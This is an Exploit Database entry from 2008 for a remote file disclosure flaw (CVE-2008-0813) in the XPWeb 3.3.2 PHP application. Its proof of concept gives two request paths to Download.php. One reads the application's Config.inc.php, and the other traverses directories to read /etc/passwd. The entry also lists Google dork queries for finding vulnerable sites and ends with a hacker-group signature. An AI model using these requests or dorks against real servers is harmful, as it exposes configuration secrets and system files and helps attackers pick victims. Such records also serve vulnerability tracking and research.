XPWeb 3.3.2 Download.php url Remote File Disclosure Vulnerability

2008-02-17T00:00:00
ID EDB-ID:5137
Type exploitdb
Reporter GoLd_M
Modified 2008-02-17T00:00:00

Description

XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability. CVE-2008-0813. Webapps exploit for php platform

                                        
                                            ### XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
### http://puzzle.dl.sourceforge.net/sourceforge/xpweb/XPWeb_v3.3.2.tgz
### POC :
###    /XPWeb_v3.3.2/Download.php?url=Config.inc.php
###    /XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd
### Dorks : intitle:XPWeb 3.3.2
###        intitle:XPWeb 3.0.1
### I'm tryagi .. TRYAG.Cc/cc

# milw0rm.com [2008-02-17]